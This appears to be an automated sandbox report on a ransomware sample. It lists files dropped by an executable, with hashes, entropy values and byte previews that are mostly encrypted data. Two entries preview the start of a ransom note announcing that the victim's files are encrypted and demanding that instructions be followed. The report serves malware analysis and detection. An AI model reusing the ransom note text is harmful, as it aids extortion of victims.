                            Size (bytes):1250
                            Entropy (8bit):7.850790605823942
                            Encrypted:false
                            SSDEEP:24:bQ7GSUnlOFBmwYkjJXqUh+7fOXaVFIm5WXw4lGiQacm0x5:bQS5nlOnmQjo6aVyKW9lhQ6y5
                            MD5:D2EF8A0672C766BD95AC7BACE04C20ED
                            SHA1:6D1BA0100367EA4E9B82EE7B951522BC3D91BD79
                            SHA-256:1994D4273AC0627E6C68CF870D675E4DF75F8F9FC9612E3A06881E0B76609AE3
                            SHA-512:058EB77CE9B80A920C86CB944B5446C67916408BF387255EC4EBC03DFA07DDA36586C1380826B70A6D364C479078CE009B37CE2870E5923CDB29E6228949E583
                            Malicious:false
                            Preview:3..x........%..o.@..'._......6.7..X75R......B.._.y7..H..M=o.\4.v<.9..IqA9qS.....oIP.dM....g...+..8s.m.RI....(.'.G.a.b,;..R....F`h.\[ {..&W.5.Zr......q.m.7...j%%+.......x.......1.jJ..d....Zl.WP...?^.oJ5/...&..6e..f.f.=a,h.58..(.K....#...SX.6K.....^.b..^w.k.c=G..P`...t....N.l..(c..u!..:...mK.M_;$..E.GU... ....W...u.m...V.\fN..[^0.1NGM.....J.|.$.v.T@..'|.......D....[.N%*.~../....`..*..? 2K...y.+..o..v.~1....}.z.O....A...)...X........m.#..b..2.fc./.7...Q.p-0(.Z.l...5A.........B.@.v.$8.$.#.x..:..@...xz...z.....V...]..p.OW)5.~b.r..,.}...(k...j.....9...'...u.....>..}.......s..d...{.z...~...B.q..H.\(.K..............*.c.....B......"..d.l.Jg.......)...|....A.K.....ez.?H..w......Q.F.%.10:..(.....9.:.Cb...-$j%j.L..C..!.0~..".o)G..F....uk=.IW..g.~K...6.H..........'...L..|u.....[....<m...:H.LEZK*...........g8.~...-Y..R...w|;...5.+.....{.k.....[.....!.T...Jg-.'..2....r.....m.?..g.l..c$...V.....9UH\....S..R.*.mse-.w!...gB......P^.?@/y...#j..N....".{
                            Process:C:\Users\user\Desktop\RQzHm5vLxs.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):1250
                            Entropy (8bit):7.842842628034003
                            Encrypted:false
                            SSDEEP:24:/U8ts/NaAr3M6fgOt59N8ZjZ/5UcLjpq4cFJeYgwgVZQys+7v/BmOHGlGiQacmZb:/Xt4N13M6fvpo/5UccfJeYTgVZXv7hor
                            MD5:4541CF32FD5C55175D0AE8A7D140E4C5
                            SHA1:D254D13AB3848AFAF2C7C9A23C43E1D6CEADAE32
                            SHA-256:DD51FD08AA6C5C053D1F3487A61083214BC44B2716C68C469E179F2375B9CADD
                            SHA-512:C2F79065C6964978716AE87F536C32634C985A6288F033FEF858756891386B9091A4C733E764106433B9CEB49917AA9F2AB85AB52CE4B1A88FCB51E93ABCFDFE
                            Malicious:false
                            Preview:{..JJd.vO}.'*.>....F.(%.....wp...~$;p`I..z.L$.8..+......r.HK\..4.T.......Xh...]..\.YZ.p&.q....P.z'\7..N@.....*b..e.+Cn.(,5..$.<.......z.fj.& U...."..Nh.+D.D%h.....,.../...}.M2:i....{..XrN.s.%U.j..;..z.s&?4T#;..xl....E....0&.....Z5...<...<[...mG.4..`R.I.5K4.'.S@:...."'u.T.9+..}.{.{v...J.w.....|..L...E..h...G..3......Z.H..`I].^\w7..w.....D....c."W_<.%..k...I...yXQ........z6...K...Lu.3i.pS.~A.z..h0C..;..yi.T.Y..rr...|R.."........T5...9e..H.......6.{..K)A.._..b..U..Z...%..Oe.4.o..Kuh....;.. .T.t>....T.{..+.A..P..K..C..wo.. .y......n.V....9...~...8.y~..Y.J7...h..`../.....0....[.cN.-9..t5.]~:..I......b...C...QnG.%u.D..N.{../.h.A....5<.7F.....eQ.......z......^vO.!.V...\...pK_b.[w*.-7...-.l/&...B. .8..N..'...rqV..rL..6.@.2..,ZNXx..Pu....N..p...;..+.^..*.....h..=2-..IcL.7./.*.0K.+........e.vm->~..B:..]....V=Q...&....e..&U....].P.'....s...T..../.....14.n.-.>D.i;...F....a.s..J..Q]'.87"...Dg..].r.n=G.%z...7[ ..V.....x.{?.._.z........h.Q.
                            Process:C:\Users\user\Desktop\RQzHm5vLxs.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):1250
                            Entropy (8bit):7.8414022505026955
                            Encrypted:false
                            SSDEEP:24:DPSYyG1bSpu/2i3ZxpJxlarpd5OKkdIX9u1Fc79qQbh+XhW/xklGiQacmz0D:DPSO+pzi3ZdePoKkM9Gq79q+hqcklhQn
                            MD5:752D16D04541293C2E2463EE3227C047
                            SHA1:4708782C9F0B5AB81CE1069CB7550396748C6AC4
                            SHA-256:F408FF4E2DCE2E4DED87562EB611BD8987040CA61C046ADABBE37D1F5A6378E9
                            SHA-512:28959CE941DD78DDAE6D3D3186312621D9F6DBC1ABFB162A09F24C4B3B876AF19425CB47614984C99BBCD577716B362E8DC732188E03045ADAFA2BC4DDA70FA0
                            Malicious:false
                            Preview:......}..H.b..@....!_~.@..Wc.4/.J....vp5.y..S..|..s..+P.>..8..z...T@HC%N.ME#&l........v.F......b...>d.9PGa,.[~....&$.&2{.....m..V`$.A?.....f.m6...F|n<..!......A@....O.(.+C=..A..x.N.2....~.|.1.]....BN....E..x..!.q.!.'H;_5.2.P..1..).^7.[.w.p}...P..id.l.v.....5.k......Y....._a......D..t....f..O.&...td....a..NLO....\.?.V.ZjS...?X.8~...HE8Rw..B..u..^!....+w_%..T...H..t~h.Pg..FW..I..d...f.3zhP]S...].w(t...._0BSi..y,C=.xt...B+.Zt............2b.g&.....a.k.)...b..s.q.....?..|?+8*R].,..A..../mR ...9RH...,(.._g.O...*@.D.~.;.R.......-(.V...y.Z.....f.i..S..L.6_,O..xDZ..dg.J...AJ..sB...)B4...n. !KUj\.TV...mj..O......t.-6YO...8.=...E<~W.9......d.+...5..F. q.%..X....(R.a.L.1..4.d.....F..zFa..j..).d.u....Z+..@.w...[=&..<.a%{j.H.}.I.7&..uw4\.c2....'.t.V..wI.-....../a...........J(o....]..:;...s.A.:..Y-.V...Z.....{...$.\.<Q..6_.}..fG..m.7m<f.C...o.ggrq.sN.....D3.7..i......<..a.N....Ds..>..0..[.'.%I...0...-.......]E.-.IM.+.0......#...=.W.jO^.Z......J..1.[.F..
                            Process:C:\Users\user\Desktop\RQzHm5vLxs.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):1250
                            Entropy (8bit):7.837285044582635
                            Encrypted:false
                            SSDEEP:24:LOE3xCnffGpFFxt685tStg6GrEpkx/KFZJ3zk1t9phqd+iP/e2lGiQacmDlqL:zcHGpfxtFYtXGrEpKKFZ5zSt9SsiP22C
                            MD5:9C4D7A3053D4985D9A8C60AA321FD04F
                            SHA1:0657942F02118F0DBAF8057AC121812ACFF68AA3
                            SHA-256:464124D29ECEDB253E6BFA1A74D7AF3208A4C0BBADDAFC7670019868B1D138F3
                            SHA-512:20D9E9A4E57062F3C4C56539130C9407BFDC12852893E769940D392DF7D32A96FA8A701F17E3BD622DE41E4C6903A6D01E820B4F32933422BF5DC6399F29C645
                            Malicious:false
                            Preview:...."PK..Y...M..s62Kk.........u..*.......Q..I....s....s.~......m..in..0R;..]p..P'._h...WV^K~.^...O..Df..=.]S.W#c,.+p..?&.........w...V...2$........T.x...J..d.... ...."./S...0..h].>L().=.~...F...Y6......M.....T.\..cA..........9.>..-m.`.5...8.....Q.7..Vo.|.G......]..q g.......R`#.}.r)M....?....Q$...n..........}%..Px3m.W.....] ...A...e...e/0.J....%M...`.j.SdzG.R.Hq..?.;...c.J'..J.J.....K7.a..F . .u.sR..Jy...VK...$"G..?.|....-|....(.......u..3.....MY...E.../.Gp.;M2A-|..OB=.7e'7f..I..7.W......F...G...5...5....RNw.....C.(O...jeNZ~....I.:.x.1.....3.X..`...i..gc...&%....yI;k..F[.......m5.{.o::.B.l(.5.My......hB....W/B....6...A...R..(.@.:..s..d^je.....S,.).......T..i:*~'y.a_a.#...G....._.y].R.E...uD.`...BZ...2;9i.V.E..lW..?..1..p.u.v.U.o..:.X..f.{.]..!h=..>.ev.n.......r..,~&..@.gh.F.=LF..x.........x...<l.z...p..|....f.....?.6..|....D6..T..)~.-.K....8}.+Y....+..@...e...u..].. p.....]....5.P.,m.........K.i....f..Y.@.N.|...y..=..<vL..!.}..
                            Process:C:\Users\user\Desktop\RQzHm5vLxs.exe
                            File Type:OpenPGP Secret Key
                            Category:dropped
                            Size (bytes):1250
                            Entropy (8bit):7.824721161717177
                            Encrypted:false
                            SSDEEP:24:QDHKSnUWIOYITcMsw/nTRuGBPQA2wlY6xPgTbyh82nHuflGiQacmMKn:QNnUWIOVTcMR9RvR4TGhZElhQ6MK
                            MD5:085A1EC41E220133DDA57B71181A0E7A
                            SHA1:471B1517D435E95A3814CBF6E461E92F38304412
                            SHA-256:40C2A5D3F767CBB3DC5C7357DFDFBDEFE702D208398088CCA43CBF6271F5AF9E
                            SHA-512:09943F19FE78E702A2CF04E09FD9669517D1AB6AE46630646E089CE7B108BDDDD3F411FE63FEA3B9A2F940A2F40E3D757B21834515F70385E040DF34A2A8064E
                            Malicious:false
                            Preview:.0A..1..6'w.fY.rvc8...R...B....3....^Q|....Q.E......I..|g@.'Y....J.....!...8..o0..q...F.......X,..?.@RV.,...l.\"..EA.N.zS.%.d...1{.xfX[U..bt'f.....',mXE.w.t.W.B......c..K..XQ../.?..k..u...W..A\.b.,...Q..5.[.k>..fr.xC.<....m....wT.._l..9...?...B...F[_.i<.....DF...{#A.A...i........k.=.T..:o.Rt........g..D.i.Y.q...=.H..Puj.b>..!....^...= @eK...F.k^.n.*.P(^|~......|.....;..s@V..V..i.6..QB.....5....(...J....-..w...fIP.M.w..$.n.T.c1.8..b.R..A..[`.cl.X.v..X........:..S3>..X.|.._z...SU0..r.........|......hF#...h^^.z_..2.QuA._...J.o.-......sSt;@....$..hY......O.DA$...vwL.......G. ...n..K..U.........Aa...-.d.K$x..y..@.ME`..3..mmP"........d.l.x.n.u.....#...c..E....<.Tdu3.\w.......,.?..o...M....q.Ak.....n..o...($ d..@U.i(..e.z....J.\.....W....^a..ef..>j).....{......n...d....=z(.p~J..w^.@......m...[.?...."<#.B...L. ."}...;.]....FJ.!..#..\. g..V...Q...,.o"xI..e.\..!@......9...%zk.l...f..a......K.v.!..%..L9.m......<.....Er>#:..I.$.....e..>......U-..Q_.u'.
                            Process:C:\Users\user\Desktop\RQzHm5vLxs.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):1250
                            Entropy (8bit):7.831218513954768
                            Encrypted:false
                            SSDEEP:24:ZHEjVkOZWOU80DBwGEtVRMUmwiAooN2sdBbSZFBEs9ZCGlGiQacmTh:dE/ZWOU80tgLr79N2flhQ69
                            MD5:5A24970E900F082CDA37AFE204B4266E
                            SHA1:E0F862726DEF84C705C4F3CE378F25D329E47B63
                            SHA-256:D302A2DBC93B3879020ADE2D539FCC65FF981C256FC2F0D880CE64D15D13BCBA
                            SHA-512:0248349B750B7760F4C23978C5198337C346BCBAF482CF59CFF9337A641C60EF6548306399382142C5C3CA413C145CD6924A99999E9282FA909BE22876B50650
                            Malicious:false
                            Preview:.F..e...y.........Et'._...p..X..w.zA[....Y8.....[q.o...._..&.../>..w.../Vw.......R[/E>.Y....1~G?.El...Y.C..$w.....kM..L.g.XL.....3....,l?.p...{..h..O.a.$...\_...K.....3K.H..(..O.O.\N5<..cg=..t...D.l.6.$I1.\.@.|Ep.h.!S..6...r..IG..ow.......B.A.........E.$...7........._.tw.]....1XC..+....e.\......C..S...UI....a..a^u..7.]..=._.H...lQ..RH..5q..+..J.?.......]<....w3i.o..%?.R.`.(Wc.8..(-..j.8.x<m.......~.~.\....#t...X.c.TxD.]..M9Q..:Q.....Ej3..W......E...9..\...I...<.<a.n..Ls.....f......O.vYe...*P..4Ul..5.....yB...0....x..uh..u.Q..=.nEr..._t........>.96...l..^......[.....V>z.$...9.3$....Ul.._....4.c;^...0..x..p.....n..^.B..7...2.).k..'.E..'..W.._.u...5.j)...B9##SY.NG.v*.S.~[........0.y.....LR....v....Z.b._[_.i.\.:f.Ik.~C1N.............'Vf..l.1...h'.KO.d@E....l"...wS.s..-.a..)....v>.5..Ar..T.......UI.O....7 >...&.+V...`..:X. ..v....[.<05.#[.:.=.....|qT....z+....*..EL.U ..R....3...C....N../rEU=D".........h.}6.o.;.|J.S.,...p!.{F...Cs..{....z.[z.AO...P<....
                            Process:C:\Users\user\Desktop\RQzHm5vLxs.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):1250
                            Entropy (8bit):7.8432303289923935
                            Encrypted:false
                            SSDEEP:24:oXYTBLRUkgHh/7ZhgxqAQKpCFQv+6v61jmDVQF7pw5+SvPNg9lGiQacmPFI50k:oXYTgBHhTZupS6+cDQi+Yi9lhQ69e0k
                            MD5:99F4404CDCB9AC272FF50CD715DB5E7E
                            SHA1:2E45D55D3E75BCE5B5E13A0FA740DB1D708866D6
                            SHA-256:8FDC8E781BC5F28329CC50E0CCBDFFA2542801909823D07B0EFE7FB8BC0CCCD7
                            SHA-512:25B9CB4C2B7F19B38A73E7D2A830C3332A05CDA47998869EDDF2B3226C772C295570D39814A829EA0325FCCB6C6B1AE4872053EB554CB6B0FB5454E5E93D7AA0
                            Malicious:false
                            Preview:o')h_.../4....q...\....F`.{.........1........m$..../.\.m.\!.BIt............q.....'l)5X......H.o...]..d.J.P.9..,..e..N.5K)..p|....3.>...2..mR....w..9.8Nc...7..?p..^..j....N..7.%.......{Z.u.mZ<..|O^..\$.$'..-....,....<..../.#.G-|.K.?H/...9......k..._..N.FQ.7.@,c...QF/...w7K..o|..X...J.^...Iv7..+...8..?..._r.<..5.1a...........o.u0s..?..U..32?w3...V...c....+..[.;.q.... ...#.;;.....q3o..K..}5...y.y..*.Z#G.D...'.!.b...!...l.~z...]..7...\*...s...)....[!J_...R.?..Z...?........aR..+vr......h...:.D....$.T.'....\.h.(K..*.U..c.D?T, P......sc.m..b.?...Dq.L}.wm..o.O.CQ..\......=.~F. .q.:....\.e.B.$.....'I....>@.,.~..^.:N-.....u8.. ..4...<.........S!...PI._.;...|..&S.D...[.........(o.4..E%..}.v,=./......}.gib_*f.s2_..J.>....3Q(.w..L..mq.5,nQ<L....g..y..=.]@p:D.B6fz..i .....p&.GhD=`)3.,..+t\.NY..*.rg.....~....yu...&7i..J....S...(.k)..$c.U{z..}8.8R^.n....h.dE.|...3C&4.....q.O.D...T.._' ...... r.[][...).M.-..'..`.zW(l/..{Y1.../v%.sG.!.CfMS.:.(.......j
                            Process:C:\Users\user\Desktop\RQzHm5vLxs.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):6680
                            Entropy (8bit):3.8419680745916676
                            Encrypted:false
                            SSDEEP:96:GLjiNsg3xU3TPTfI32yY+GTKw4R/N7t4p2nqIt6ixOZbYd9PrR5u:GLjZ3jrI323/uR/UknLQFZkDW
                            MD5:C4AE8614F7DD1E8F9474903596B17D0C
                            SHA1:419F30931FEF8DEF258C45AD2712E436AE35791D
                            SHA-256:55077AEAEB946594FFC07DAFC6D9BF2556028D1712EB4613F6886B50E4C24A7E
                            SHA-512:A8927B577C40A8C5575B69186FD95AFEB003E3DA46AF92AE4DD9ED51BA60422D75AFB9ADAB6584A13BD310D3AF01B3EF16D2EA16AD3F63701019E7597FDCF5D0
                            Malicious:false
                            Preview:-.-.-.=.=.=. .W.e.l.c.o.m.e... .A.g.a.i.n... .=.=.=.-.-.-.........[.+.]. .W.h.a.t.s. .H.a.p.p.e.n.?. .[.+.].........Y.o.u.r. .f.i.l.e.s. .a.r.e. .e.n.c.r.y.p.t.e.d.,. .a.n.d. .c.u.r.r.e.n.t.l.y. .u.n.a.v.a.i.l.a.b.l.e... .Y.o.u. .c.a.n. .c.h.e.c.k. .i.t.:. .a.l.l. .f.i.l.e.s. .o.n. .y.o.u. .c.o.m.p.u.t.e.r. .h.a.s. .e.x.p.a.n.s.i.o.n. .9.8.5.d.r.m.9.......B.y. .t.h.e. .w.a.y.,. .e.v.e.r.y.t.h.i.n.g. .i.s. .p.o.s.s.i.b.l.e. .t.o. .r.e.c.o.v.e.r. .(.r.e.s.t.o.r.e.).,. .b.u.t. .y.o.u. .n.e.e.d. .t.o. .f.o.l.l.o.w. .o.u.r. .i.n.s.t.r.u.c.t.i.o.n.s... .O.t.h.e.r.w.i.s.e.,. .y.o.u. .c.a.n.t. .r.e.t.u.r.n. .y.o.u.r. .d.a.t.a. .(.N.E.V.E.R.)...........[.+.]. .W.h.a.t. .g.u.a.r.a.n.t.e.e.s.?. .[.+.].........I.t.s. .j.u.s.t. .a. .b.u.s.i.n.e.s.s... .W.e. .a.b.s.o.l.u.t.e.l.y. .d.o. .n.o.t. .c.a.r.e. .a.b.o.u.t. .y.o.u. .a.n.d. .y.o.u.r. .d.e.a.l.s.,. .e.x.c.e.p.t. .g.e.t.t.i.n.g. .b.e.n.e.f.i.t.s... .I.f. .w.e. .d.o. .n.o.t. .d.o. .o.u.r. .w.o.r.k. .a.n.d. .l.i.a.b.i.l.i.t.i.e.s. .-. .n.o.b.o.d.
                            Process:C:\Users\user\Desktop\RQzHm5vLxs.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):1250
                            Entropy (8bit):7.853000750091274
                            Encrypted:false
                            SSDEEP:24:wcQ6+qazYyuaAk7aBgvWNpRuV9ikafjdxVFufVs1dlGiQacm3/:+6+q6lTh+ufihfjnXutAlhQ63/
                            MD5:9B6A8F4AC693345D30652FEB91C67F40
                            SHA1:EDC83EC40E5848FBCB5C4D78CE276C64E1D9A2D4
                            SHA-256:0950CFAD094A043EAE0EC73B44B7A18DDDB49A4C372B38F8659AF0B4DFCD038A
                            SHA-512:A2AAD2D9A0EEB2B9AC3E9F50873EA77601E3C44DCF925760A23311EE95843A4A204BB9707E7FBBA57FAA70D5D596274563F3A21E7D09E42F130C62A443F8131A
                            Malicious:false
                            Preview:$z..Q..... ..a..7~LT.h....a|7...Gjw.......6.A.......,...h......6|... 2....%Gv...D..l5$..m..B%..-4.@.....5.v..#Q...&v6.F......L...."O..bZ.4..G....v....g$...~r....-0AU3I..\..J-.z....Al....G.<......... B.zf..n....A.....W..........2*......F.z...j.u..9.^C...u...m.~dz..k..aH..oLJ.B..........)...m.......6xa..[..P.........6.o.*.a...CWWLvH.....f....3.L.&.n$.E.....@........@(^v...5..$ Z...5..Y}...gB.%5qi...x..q.>.../.".6.`.S*..sX..i.... 6q.........z.,l."UkP8...k...Y:Pec.2...,......h..x...C.....:,aT.@'.....1t.x.@...z}So....%.<.q;.................d~.....J.:/l.|....^r9f.32.dn...%#..g.G..?..B.}.m.L..N....x.2|.J....Za....3...dQ.JAg..I*../....".l.........1.7..[.1.q.....o'.....Z...7E..../....8.....(O..\.M.3....0^.R...._j...*3;...A.*......3...p.x......H.....F.... ..y...Vl..7.{..S.g..9.=..^L.1..#1\..R.U.y.d|.54f.l...e..v.A[..t.%.N...=.e..g..6.T.-.D}+[..w...w.z2..aO4....o...\..^Ft.!.".?..@X5/...&.0u....Ijm..V...K..V../.^..Xr<V>.B..:....T~...Y..+..B. h.-
                            Process:C:\Users\user\Desktop\RQzHm5vLxs.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):1250
                            Entropy (8bit):7.854999384383747
                            Encrypted:false
                            SSDEEP:24:+SJcCKjsaT1X3JvmVEN9bx7cJjdegMw7q3uSFbFZhe+SRFplGiQacmzO:v3WNpv2ENdhEjdeh13HzOlhQ66
                            MD5:991AE3F0E4BB5BA07B194E2923F20AD3
                            SHA1:D711243EDDB1F0F317B81EB156CCB7CB9C5BAF91
                            SHA-256:157A2F188CC1E5CC39B51B19961A194E425ADB310C96A2D14E8C3AA59BBD656C
                            SHA-512:142D436B3CFB3860428543E956D66342A956193E5275B497FE2D9B85774BDC5F8A53861E1148E627DEBB63836668CFC573E2121BCFA54950AB0803F025524B99
                            Malicious:false
                            Preview:..;..ZL.d.T.......S...c........@..z.G...:..7.*lq....Kh(.v./c.h}.vX..A......}^..i..+..r.'3.....s.M9.......nz.~...?H..s.=.8N..)........4.J.*N*..O...>;J.WF,Y.j...v..Q...W....8}.......i.Fw..OD`.J...Ck@Q.z..A......Q.....C..|..]-.`j....W%c.F..A..;.).N....B..J.e......4......y.{j5;...AM.....$\..f..x..G..%..~.b.H~.B../V_....A.~#..X..b....h7*o.RC.H..%|4..r.l.d.....d.&.F..~.f...7..$......>..Z.*%..............<R......C$. .gq.Q.$e#...&.....?...:.lH.W.SR..b.>..'Bw.s1.Y..`...K.....?........1...\.b.^..4..s.@.X..,T.s.".^ ..-...@.g...w........t#o,"..1.....?.....Z5..nUY.%.....1.i.l..UR...f.G..}......._..h...v.eK..o....EO....vol.E\.....)lt..`. ..i...%....%../...[`...w.J4.{..s9q..x7 ..{.`.aB...1.H>6.X...jQ~............./...(K.."..[......C..3.5J..wI;...+h`me4...."WL.S.T...U....D...h.'d...i...S....O[.. E.3...."..V,VE4..=C..o.(`..h,wTO..e.;..";......u..@.-p..C.ciu..._.T..3....Il`......Am......=b=.. ...X.@zl......8D"d2M&3.c...>.)..?o..l(.>...?..=.M.,#.`n..H.JDs..J....j
                            Process:C:\Users\user\Desktop\RQzHm5vLxs.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):6680
                            Entropy (8bit):3.8419680745916676
                            Encrypted:false
                            SSDEEP:96:GLjiNsg3xU3TPTfI32yY+GTKw4R/N7t4p2nqIt6ixOZbYd9PrR5u:GLjZ3jrI323/uR/UknLQFZkDW
                            MD5:C4AE8614F7DD1E8F9474903596B17D0C
                            SHA1:419F30931FEF8DEF258C45AD2712E436AE35791D
                            SHA-256:55077AEAEB946594FFC07DAFC6D9BF2556028D1712EB4613F6886B50E4C24A7E
                            SHA-512:A8927B577C40A8C5575B69186FD95AFEB003E3DA46AF92AE4DD9ED51BA60422D75AFB9ADAB6584A13BD310D3AF01B3EF16D2EA16AD3F63701019E7597FDCF5D0
                            Malicious:false
                            Preview:-.-.-.=.=.=. .W.e.l.c.o.m.e... .A.g.a.i.n... .=.=.=.-.-.-.........[.+.]. .W.h.a.t.s. .H.a.p.p.e.n.?. .[.+.].........Y.o.u.r. .f.i.l.e.s. .a.r.e. .e.n.c.r.y.p.t.e.d.,. .a.n.d. .c.u.r.r.e.n.t.l.y. .u.n.a.v.a.i.l.a.b.l.e... .Y.o.u. .c.a.n. .c.h.e.c.k. .i.t.:. .a.l.l. .f.i.l.e.s. .o.n. .y.o.u. .c.o.m.p.u.t.e.r. .h.a.s. .e.x.p.a.n.s.i.o.n. .9.8.5.d.r.m.9.......B.y. .t.h.e. .w.a.y.,. .e.v.e.r.y.t.h.i.n.g. .i.s. .p.o.s.s.i.b.l.e. .t.o. .r.e.c.o.v.e.r. .(.r.e.s.t.o.r.e.).,. .b.u.t. .y.o.u. .n.e.e.d. .t.o. .f.o.l.l.o.w. .o.u.r. .i.n.s.t.r.u.c.t.i.o.n.s... .O.t.h.e.r.w.i.s.e.,. .y.o.u. .c.a.n.t. .r.e.t.u.r.n. .y.o.u.r. .d.a.t.a. .(.N.E.V.E.R.)...........[.+.]. .W.h.a.t. .g.u.a.r.a.n.t.e.e.s.?. .[.+.].........I.t.s. .j.u.s.t. .a. .b.u.s.i.n.e.s.s... .W.e. .a.b.s.o.l.u.t.e.l.y. .d.o. .n.o.t. .c.a.r.e. .a.b.o.u.t. .y.o.u. .a.n.d. .y.o.u.r. .d.e.a.l.s.,. .e.x.c.e.p.t. .g.e.t.t.i.n.g. .b.e.n.e.f.i.t.s... .I.f. .w.e. .d.o. .n.o.t. .d.o. .o.u.r. .w.o.r.k. .a.n.d. .l.i.a.b.i.l.i.t.i.e.s. .-. .n.o.b.o.d.
                            Process:C:\Users\user\Desktop\RQzHm5vLxs.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):1250
                            Entropy (8bit):7.84376301765612
                            Encrypted:false
                            SSDEEP:24:HRapKAtG8s46g+4Qh3mMBYDJlaGVkTlzXee4pRtOFyjaFilGiQacmt:HR5CG3TfpmMBY9lITdXT4pXKilhQ6t
                            MD5:4843C53CB7FF5C664EAD537717FA9CBB
                            SHA1:3317BB3547B77AD29DBC9A2F0CA45DA0E95C0D46
                            SHA-256:41C16010C1F7FFE26C5A374BA6574BBA5C274BBAE601169FB4436D0D0A69E4EC
                            SHA-512:CD7703F564DDEDD89672FED454B7A24DF072B08042FCDD7CB260562830886E93ABD87B550BFCA5ACBA8F35CF9DD3B37F946934331EEE0751F43A94CC6B52A7AF
                            Malicious:false
                            Preview:t.#.q....X.9.V.V....3BF....dq...8.xs...$V.....U.|.C........%.(.........A{.zd...C'...a.8>og..P3...:.. ..q....[.K.-~'...1]..17B.~....~$.BQ.#.U~Q}._..B.E" ..8..>.at.KW.f.../...*..6.Q....v.....rY....7....Zg;:.%(}.....N?.f.*..k..=...g..a[:f.t..<$.....&.+.?.g..c.:..=.RQ....a..F...7.W....5.[...iLP).....i`A.Q.:...i.2...g.8\..yP..Z,.q.P..P'W.`.V....).wO!......X.a.X.;.<z..2.....WY.~...0k....4z..-.%Z..#.I.~.7h:.q.5J.{K...N......Z.(......p..?.....5k...-*.............0......!<1..t.........y...#...n31...z6....a.....#...".A8OQ/.........#_HM|k....z?B.rB........H.a..}b..o!.......o".4dq..."x..vd{.2.Q....c`..,...e.R.a.)y:}G...b.n.TEA..+@. ...*.L......h.|z...7X.ln..)^=~.l....~..N.62t......k.....!.z.x.-.K..UoU6..0w.[........@j......sL.\l.....T..b....cM..J.....].=.0..,...-V...HU.h..........-...f..o.b.pET_.....C..< .R...V].*......*.o.?....;........%.`U..Y/...b..n.....p.._..]...Z...&.J..2.F..G...C.@>yL3.....=s.f...q.A.D..|.A6.hq).........7.$.8.olG..[7v,..,V...7
                            Process:C:\Users\user\Desktop\RQzHm5vLxs.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):1250
                            Entropy (8bit):7.839291107307158
                            Encrypted:false
                            SSDEEP:24:+6izEl1nS+GMdh94YcSHe5jX5WY/jVK7Q+tIT0QujPJir6OtHh7WEd9KDWtpSil0:FMsNFfttdH0X59Lk7360hw6OTWESWtfm
                            MD5:33AE01D381284035B95BF78DD763CB68
                            SHA1:29B7F368E15C87AB2B0A96445AE03CF8AF8BA02C
                            SHA-256:5B72BA0DE80B9FEF8DFFA13B3AD33AA6AC95646ACDAAF3781377008EF322761B
                            SHA-512:DD06FBE3CCDF499F6B33A408E4C67EF492E0AA8851CCCEFF5813F4811B229890D98A3339E7631ADD2EAA6DCCD050790064B3041DAD4A643B45B5F1B792706224
                            Malicious:false
                            Preview:.!xq.._.q.1QH.;:...3p.}%..Utg.j..5.SD.....q*.P....g*!.=.]..............#...n.....wwc..l3.....%j.@.W.~.T ....o.*..h.vf..l...Ao....l.4`.V.XRf.....A.....%".Hv....[n.!..J.O.4.....-.Q..}..?..(|.|.#..a8.2....%lX....P.Z.sPn..3N*....}....0....F5..*8.E.......M.!..>..*..n.@'..'Q....Nt..o.K.. l.].....[..:...x..l............f..W.\.g$..\....A.p1H*..b..9w.y..B..........................d.Au....c.....P......SC\...-v..2..o..zsX....%..\..4lD0v'.n..!..#....[o...7..uz.....J.............J.$N........W.....O....D:H.~6"TD$..............^...A....U..V..A.`6........[.o6......F..U...n...#......C"....W5....Q>..F..4I...R..D|r.. c~h.i..V.X.......S... .....n.-...w.8..mr`4t73T..{.T....o....Z.......<.\.bu.M.o7K.....Ml.Pv.."......%.....^...;.ry..C.\.N..^.._jU=L1../.y.OI......X.... uZ...3.]...|.....&.$.m.q...B.a.J.z..3M[x..W..<....tM<Xl..F..R.}l...yb...G..J.D..7D....(....j;.4....D.zUN/.?..>=i.b=.*%g .Q...I...K.........+9.R.........w.."..B..s..J..`s>.O.....U.H..[.|....
                            Process:C:\Users\user\Desktop\RQzHm5vLxs.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):1250
                            Entropy (8bit):7.848130416950041
                            Encrypted:false
                            SSDEEP:24:LitkIKLomYymTHiswnqSp7UZ/MGmL24VAXlGiQacm41V:Li+IKLzYyciTq87yMGmL24VAXlhQ6M
                            MD5:5A909C824EF6EC28DFD0423899A9B479
                            SHA1:7F802DD4269E88F98C1B5A12BD588C6C807BDBB4
                            SHA-256:E6BBF74DC66D7BEB0B5BFFFBEED29EFF95106662037E57DA99D80DB7F88B32CC
                            SHA-512:0225225A59F182DCF2457F7161A55498306794BA3EB789069E5587C8F364E1D9C17131091496C6B3910DC635B53DB8E5349BAB570EA7720414A256EF2208A495
                            Malicious:false
                            Preview:joi.m..T..Z.c..B..s.....>..osz#....~...Ce.m..' .^...Qh....(wc...... .%.K..B7.8..D...)..SY.~.+.........Jd....F_.(...U.p..|G...`.U@.|z.P.*.mhR_.'...<..<#.]Z....1?.....WnV.....36.rA{|.I.Sx..+.../g.....)......ZD%..g....@{...b.U.r.5...^..s.{M-.x......i..7.c...p@.....D.../..Z.....G.H....q.....cOU..<.M~..X..F.(.w...]..{..T...*.....7.M.&..,.....8......i..NZ..X..Z.-.(...6........A.$.....x.....JN..#,..0.......u..c....O.|J]J.G....5|L..I.l.s...L..@..CZ.}ni.!.A.H....;d..,;h.......P.A.~...D$.....1..6.W....].~.[j.}......|.C......F....'!.T]..H.D.q\..s-..U.N@.p...0{.,..>kC..O...j.l.!Iy.o.UF.l....@T.G..l4..O._=j...k.#..y...... .....9(S...,+|n<.P.]...>'.K=..Y.c......+.|V......._..m..FO.~B.Y2..0l.+F ..M;....cA..iZ..y.f....i$!.2H..A.<m.....O...O..K.Q...-..J.7.=....{.....A..u.g....d. ...*.....*.....{`\.KF..T.,.rA....r.....u=<a..:yt9HH.[....g......&....J3..^Rq 